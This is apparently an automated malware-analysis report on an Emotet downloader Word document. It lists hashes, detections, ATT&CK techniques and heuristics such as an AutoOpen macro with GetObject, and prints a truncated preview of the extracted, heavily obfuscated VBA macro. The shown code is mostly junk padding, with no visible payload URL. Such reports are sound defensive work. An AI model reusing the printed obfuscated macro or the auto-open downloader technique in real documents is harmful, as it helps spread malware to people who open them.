Emotet Office (OLE) malware analysis — malicious · a78e540b04b64ba9

MALICIOUS

Office (OLE)

225.8 KB Created: 2019-02-25 12:05:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: b91cbf3223fa0f7e22cc161832711047 SHA-1: 17ea3a97e34f787d846a2d8b30a26f59bf34eb70 SHA-256: a78e540b04b64ba96387753e0529a1fac9d8aa24a0bda913ca91ca67fb6ecd70

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6899208-0', strongly suggesting the Emotet family. High-severity heuristics indicate the presence of VBA macros, specifically an AutoOpen macro that utilizes GetObject, pointing towards an execution chain. The obfuscated VBA code further supports the hypothesis that the macro's primary function is to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6899208-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6899208-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 48121 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	48121 bytes
SHA-256: `a48a00b115e429245687d443939482337a7bd6c9f05ec30f6a4f6ceedd1d9174`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "c_52__" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "i14_483_" Function a8_00_5() Select Case z681768 Case 319945781 H34064 = f_86_300 E6__29_3 = k_5__064 j_04__3 = Sgn(636137071 * Round(413265609)) Case 329739676 a0409510 = ChrB(938968997) Z_0909 = Sgn(309701051) m537_72 = C_09_70 End Select Select Case m58_5___ Case 28904041 j___587 = P_8_2641 H9_120 = V8__0225 R14_42__ = Sgn(815292308 * Round(838961137)) Case 781167492 r____0_ = ChrB(658848697) f_02846 = Sgn(547683839) d___36_ = q_28__ End Select Select Case K3_3__51 Case 766290271 N3_79___ = j__7131 q7641_34 = z7__34_2 Q_7_59 = Sgn(416253355 * Round(48864305)) Case 746249419 N0_37___ = ChrB(716723002) Z__2_10 = Sgn(216925156) f291_9 = P2783__ End Select Select Case v9__9__ Case 137773687 k928___9 = A5__3__ Z19_31_ = w991__49 k2131579 = Sgn(698254209 * Round(113233807)) Case 504451595 q___3__8 = ChrB(86460846) i2__9_ = Sgn(616167620) F547_88 = G1469_5 End Select Select Case Y_45589_ Case 447360223 c_98_5 = R644_16 t88__7_3 = V28_5__ t_67_7 = Sgn(578276451 * Round(488593882)) Case 225488329 O_10__ = ChrB(270278837) Y_5__36_ = Sgn(671905066) N459481 = K_89027 End Select Select Case X64508 Case 790874376 E_3____ = b_023_09 v___9_2 = W18__429 c688855 = Sgn(503056318 * Round(374938060)) Case 177050382 E32773_9 = ChrB(122992767) s__11__ = Sgn(115703765) B_57789 = l6___5 End Select Select Case Z1_72__ Case 75873386 i_1_85__ = O697261 j__741__ = k___2_0 q45_9_4 = Sgn(106767341 * Round(505991055)) Case 290930503 n752__6_ = ChrB(740510003) A55_5_7 = Sgn(765272832) j89725 = w3_7__9_ End Select Select Case Z9_54_4 Case 979358561 R_0_046 = U96_598 a803_9_6 = U84_6_ b__04_ = Sgn(375948527 * Round(876779563)) Case 802284817 i__0688_ = ChrB(160504530) D533_1 = Sgn(167635146) C35_51_4 = F_88770_ End Select Select Case h_23__ Case 300992782 U42_59 = q224_5_3 o50_18_8 = T___051 E_68__ = Sgn(862171964 * Round(516477466)) Case 918496625 K__18_9 = ChrB(616574147) n_7_726 = Sgn(172101187) P0__17_ = J_1__4 End Select End Function Function d_77__(O086632, U__61_5_) On Error Resume Next Select Case W_9__1 Case 45352913 Z97606 = X_336521 O_6_1930 = N_1__731 w_8_555 = Sgn(88209831 * Round(47247938)) Case 714878256 w2____9_ = ChrB(235753172) l_9_44 = Sgn(938570394) B7_540 = L29976__ End Select Select Case f3973068 Case 690358527 C___0_7 = v80_9_ H_42620 = b_51__ C59_80_ = Sgn(523963968 * Round(636132264)) Case 941946358 u_3__6_ = ChrB(916806263) o58967_1 = Sgn(918060135) G8050_ = f_38_4 End Select Select Case w4_26_8_ Case 592531615 P_____38 = v____7 u563_569 = F7435__7 n_4___ = Sgn(61020864 * Round(357924549)) Case 986929124 a_2_582 = ChrB(789609988) ... (truncated)

SHA-256: a48a00b115e429245687d443939482337a7bd6c9f05ec30f6a4f6ceedd1d9174

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "c_52__"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "i14_483_"
Function a8_00_5()
   Select Case z681768
         Case 319945781
            H34064 = f_86_300
            E6__29_3 = k_5__064
            j_04__3 = Sgn(636137071 * Round(413265609))
         Case 329739676
            a0409510 = ChrB(938968997)
            Z_0909 = Sgn(309701051)
            m537_72 = C_09_70
End Select
   Select Case m58_5___
         Case 28904041
            j___587 = P_8_2641
            H9_120 = V8__0225
            R14_42__ = Sgn(815292308 * Round(838961137))
         Case 781167492
            r____0_ = ChrB(658848697)
            f_02846 = Sgn(547683839)
            d___36_ = q_28__
End Select
   Select Case K3_3__51
         Case 766290271
            N3_79___ = j__7131
            q7641_34 = z7__34_2
            Q_7_59 = Sgn(416253355 * Round(48864305))
         Case 746249419
            N0_37___ = ChrB(716723002)
            Z__2_10 = Sgn(216925156)
            f291_9 = P2783__
End Select
   Select Case v9__9__
         Case 137773687
            k928___9 = A5__3__
            Z19_31_ = w991__49
            k2131579 = Sgn(698254209 * Round(113233807))
         Case 504451595
            q___3__8 = ChrB(86460846)
            i2__9_ = Sgn(616167620)
            F547_88 = G1469_5
End Select
   Select Case Y_45589_
         Case 447360223
            c_98_5 = R644_16
            t88__7_3 = V28_5__
            t_67_7 = Sgn(578276451 * Round(488593882))
         Case 225488329
            O_10__ = ChrB(270278837)
            Y_5__36_ = Sgn(671905066)
            N459481 = K_89027
End Select
   Select Case X64508
         Case 790874376
            E_3____ = b_023_09
            v___9_2 = W18__429
            c688855 = Sgn(503056318 * Round(374938060))
         Case 177050382
            E32773_9 = ChrB(122992767)
            s__11__ = Sgn(115703765)
            B_57789 = l6___5
End Select
   Select Case Z1_72__
         Case 75873386
            i_1_85__ = O697261
            j__741__ = k___2_0
            q45_9_4 = Sgn(106767341 * Round(505991055))
         Case 290930503
            n752__6_ = ChrB(740510003)
            A55_5_7 = Sgn(765272832)
            j89725 = w3_7__9_
End Select
   Select Case Z9_54_4
         Case 979358561
            R_0_046 = U96_598
            a803_9_6 = U84_6_
            b__04_ = Sgn(375948527 * Round(876779563))
         Case 802284817
            i__0688_ = ChrB(160504530)
            D533_1 = Sgn(167635146)
            C35_51_4 = F_88770_
End Select
   Select Case h_23__
         Case 300992782
            U42_59 = q224_5_3
            o50_18_8 = T___051
            E_68__ = Sgn(862171964 * Round(516477466))
         Case 918496625
            K__18_9 = ChrB(616574147)
            n_7_726 = Sgn(172101187)
            P0__17_ = J_1__4
End Select
End Function
Function d_77__(O086632, U__61_5_)
On Error Resume Next
   Select Case W_9__1
         Case 45352913
            Z97606 = X_336521
            O_6_1930 = N_1__731
            w_8_555 = Sgn(88209831 * Round(47247938))
         Case 714878256
            w2____9_ = ChrB(235753172)
            l_9_44 = Sgn(938570394)
            B7_540 = L29976__
End Select
   Select Case f3973068
         Case 690358527
            C___0_7 = v80_9_
            H_42620 = b_51__
            C59_80_ = Sgn(523963968 * Round(636132264))
         Case 941946358
            u_3__6_ = ChrB(916806263)
            o58967_1 = Sgn(918060135)
            G8050_ = f_38_4
End Select
   Select Case w4_26_8_
         Case 592531615
            P_____38 = v____7
            u563_569 = F7435__7
            n_4___ = Sgn(61020864 * Round(357924549))
         Case 986929124
            a_2_582 = ChrB(789609988)
           
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.